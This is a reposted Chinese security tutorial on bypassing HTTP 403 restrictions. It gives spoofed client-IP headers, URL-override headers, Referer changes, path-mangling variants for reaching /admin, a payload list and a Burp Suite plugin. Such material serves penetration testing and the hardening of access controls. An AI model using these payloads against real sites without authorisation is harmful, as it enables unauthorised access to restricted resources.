0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

绕过403访问资源TIPS及工具

jf_Fo0qk3ln 来源:FreeBuf.COM 2023-07-07 10:43 次阅读

在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。

这就意味着这里面有东西,我们只需绕过它。

造成403的原因

先来看看造成403可能得原因有哪些?

1、你的IP被列入黑名单。

2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。

3、网站域名解析到了空间,但空间未绑定此域名。

4、你的网页脚本文件在当前目录下没有执行权限。

5、在不允许写/创建文件的目录中执行了创建/写文件操作。

6、以http方式访问需要ssl连接的网址。

7、浏览器不支持SSL 128时访问SSL 128的连接。

8、在身份验证的过程中输入了错误的密码。

9、DNS解析错误,手动更改DNS服务器地址。

10、连接的用户过多,可以过后再试。

11、服务器繁忙,同一IP地址发送请求过多,遭到服务器智能屏蔽。

绕过方式

1)修改user-agent

有的应用为了区分爬虫或者正常请求,会验证user-agent,看是否浏览器发出的请求。

2)绕过IP限制

部门网站只允许特定的IP进行访问,应该会验证客户端的IP,如果不是规定的IP,则会返回403。

可以通过下面的方式绕过:


	
X-Originating-IP: 127.0.0.1


X-Remote-IP: 127.0.0.1


X-Client-IP: 127.0.0.1


X-Forwarded-For: 127.0.0.1


X-Forwared-Host: 127.0.0.1


X-Host: 127.0.0.1


X-Custom-IP-Authorization: 127.0.0.1

3)修改Referer

网站限制了访问来源,如果访问来源不符合,则也会返回403

绕过方式:

设置referer为访问网站的host

4)url覆盖绕过

用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。

可以这样绕过的原因:有很多的web应用,只对uri地址内容进行权限检查,这就导致uri路径正常访问之后,我又覆盖了新的地址,导致403 ByPass

请求包


	
GET / HTTP/1.1
X-Original-URL: /adminstration
X-Rewrite-URL: /adminstration
Host: www.abc.com
Host: 192.168.56.108

5)扩展名绕过

基于扩展名,用于绕过403受限制的目录。


	
site.com/admin => 403


site.com/admin/ => 200


site.com/admin// => 200


site.com//admin// => 200


site.com/admin/* => 200


site.com/admin/*/ => 200


site.com/admin/. => 200


site.com/admin/./ => 200


site.com/./admin/./ => 200


site.com/admin/./. => 200


site.com/admin/./. => 200


site.com/admin? => 200


site.com/admin?? => 200


site.com/admin??? => 200


site.com/admin…;/ => 200


site.com/admin/…;/ => 200


site.com/%2f/admin => 200


site.com/%2e/admin => 200


site.com/admin%20/ => 200


site.com/admin%09/ => 200


site.com/%20admin%20/ => 200

常用payload汇总

$1代表HOSTNAME

$2代表PATH


	
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
* $1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

常用工具

BurpSuite插件 403Bypasser:可以在burp扩展商店安装

221bd12c-1c5e-11ee-962d-dac502259ad0.jpg

BurpSuite插件 BurpSuite_403Bypasser

项目地址:https://github.com/sting8k/BurpSuite_403Bypasser

网盘下载链接:https://pan.quark.cn/s/f164943c749b


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • IP
    IP
    +关注

    关注

    5

    文章

    1708

    浏览量

    149544
  • 服务器
    +关注

    关注

    12

    文章

    9160

    浏览量

    85416
  • 浏览器
    +关注

    关注

    1

    文章

    1025

    浏览量

    35353

原文标题:绕过403访问资源TIPS及工具

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    OpenHarmony资源管理详解 OpenHarmony资源分类和资源访问方式

    资源管理 本节笔者向读者介绍一下 OpenHarmony 应用的资源分类和资源访问方式。废话不多说,我们直接开始。 资源分类 移动端应用开
    的头像 发表于 07-05 06:24 3599次阅读
    OpenHarmony<b class='flag-5'>资源</b>管理详解 OpenHarmony<b class='flag-5'>资源</b>分类和<b class='flag-5'>资源</b>的<b class='flag-5'>访问</b>方式

    apache 403错误 Forbidden解决方法

    。原因3:还是Directory权限问题(不常发生)如下文:拒绝10.0.0.0/24整段访问。这样被拒绝的主机访问就会出现403错误 Options Indexes FollowSymLinks
    发表于 01-25 14:54

    VISA当前无法访问资源

    visa报的错误为:0xBFFF0072 (VI_ERROR_RSRC_BUSY)资源有效,但VISA当前无法访问资源。串口出现问题,不执行?如何解决?请高手指导!
    发表于 05-10 17:47

    6678多任务资源访问冲突问题

    忽略了硬中断对共享资源的操作。 谢谢,其实就是在DSP中如何解决不同优先级的进程对共享资源访问的问题!DSP中有没有类似于C中的信号量互斥机制,再次感谢。
    发表于 06-21 12:07

    apache 403错误 Forbidden解决方法

    原因。原因3:还是Directory权限问题(不常发生)如下文:拒绝10.0.0.0/24整段访问。这样被拒绝的主机访问就会出现403错误 Options Indexes FollowSymLinks
    发表于 11-23 15:14

    AT32F403A的相关资料下载

    ://www.arterytek.com/cn/product/AT32F403.jsp?t=1618761051562 在此界面可以下载参考手册-数据手册-开发板-开发包-下载工具-调试工具-驱动软件-应用手册论坛:https
    发表于 12-10 08:23

    HarmonyOS开发-eTS资源访问

    1.访问应用资源资源定义:应用资源由开发者在工程的resources目录中定义,resources目录按照两级目录的形式来组织:·一级目录为base目录、限定词目录以及rawfile目
    发表于 12-20 17:50

    AT32F413_403A_407_F435_F437开启访问保护(FAP)补充说明

    AT32F413_403A_407_F435_F437开启访问保护(FAP)补充说明为了提高加密性能,需对开启访问保护(FAP)操作流程进行优化。
    发表于 10-23 07:49

    基于数据流分析与识别的Web资源访问控制

    针对动态Web页面资源中的实施细粒度和透明访问控制问题,定义片断的概念,提出基于数据流分析的“片断”级Web页面资源访问控制方法,分析数据流中的请求信息与响应片断的
    发表于 04-09 09:27 23次下载

    网络技能tips

    网络技能tips 1.清除路由器口令: 有时候,我们常常会忘记路由器的密码,为了找回密码,正常进入设备进
    发表于 01-13 12:58 1605次阅读

    在MATLAB环境中调用DLL对硬件资源访问的方法

    MATLAB是一款高性能的科学与工程计算软件,具有强大的数值计算和分析能力,但其对硬件的访问能力较弱。在MATLAB环境中实现对硬件资源的直接访问可以极大的方便对数据的处理及算法
    发表于 08-08 14:13 0次下载
    在MATLAB环境中调用DLL对硬件<b class='flag-5'>资源</b><b class='flag-5'>访问</b>的方法

    RAM Constrained Design Tips

    An summary about FreeRTOS:RAM Constrained Design Tips
    发表于 03-10 16:14 0次下载

    Linux端口转发的常用方法,来绕过网络访问限制触及目标系统

    在一些实际的场景里,我们需要通过利用一些端口转发工具,比如系统自带的命令行工具或第三方小软件,来绕过网络访问限制触及目标系统。
    的头像 发表于 09-14 15:07 8482次阅读
    Linux端口转发的常用方法,来<b class='flag-5'>绕过</b>网络<b class='flag-5'>访问</b>限制触及目标系统

    P2link——强大的内网穿透和远程访问工具

    P2Link作为一款强大的内网穿透和远程访问工具,可以帮助用户轻松实现网络连接和数据传输。特别适用于在复杂网络环境中需要远程访问内网资源的场景,如远程办公、设备管理和云服务等。
    的头像 发表于 11-01 14:21 361次阅读

    海外IP代理池:解锁全球网络资源的重要工具

    海外IP代理池作为一种网络工具,确实在解锁全球网络资源方面发挥着重要作用。通过使用海外IP代理池,用户可以绕过地理位置限制,访问特定国家或地区的网络
    的头像 发表于 11-14 07:36 195次阅读